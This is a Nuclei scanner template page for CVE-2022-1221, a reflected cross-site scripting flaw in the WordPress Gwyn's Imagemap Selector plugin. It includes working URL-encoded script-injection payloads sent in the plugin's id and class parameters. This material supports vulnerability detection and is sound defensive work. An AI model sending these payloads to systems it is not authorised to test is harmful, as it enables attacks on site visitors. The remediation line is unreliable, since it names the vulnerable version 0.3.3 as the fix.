WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting
ID: CVE-2022-1221
Severity: medium
Author: veshraj
Tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,gwyn\'s_imagemap_selector_project
Description
Section titled “Description”Wordpress Gwyn’s Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes.
YAML Source
Section titled “YAML Source”id: CVE-2022-1221
info: name: WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting author: veshraj severity: medium description: | Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Gwyn's Imagemap Selector plugin (0.3.3) or apply the vendor-supplied patch to fix the vulnerability. reference: - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221 - https://nvd.nist.gov/vuln/detail/CVE-2022-1221 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1221 cwe-id: CWE-79 epss-score: 0.00106 epss-percentile: 0.43227 cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: gwyn\'s_imagemap_selector_project product: gwyn\'s_imagemap_selector framework: wordpress tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,gwyn\'s_imagemap_selector_project
http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
stop-at-first-match: true
matchers-condition: and matchers: - type: word part: body words: - "</script><script>alert(document.domain)</script> popup-"
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a0047304502206bbcd1c2595d971b8ead937e3474922372d9d127ab66bd1fed5c16110ea6a1ec022100ced212540f206d9ab7cfe4e1194f9bf876f210d1d46261e66d30b463bc6534ac:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1221.yaml"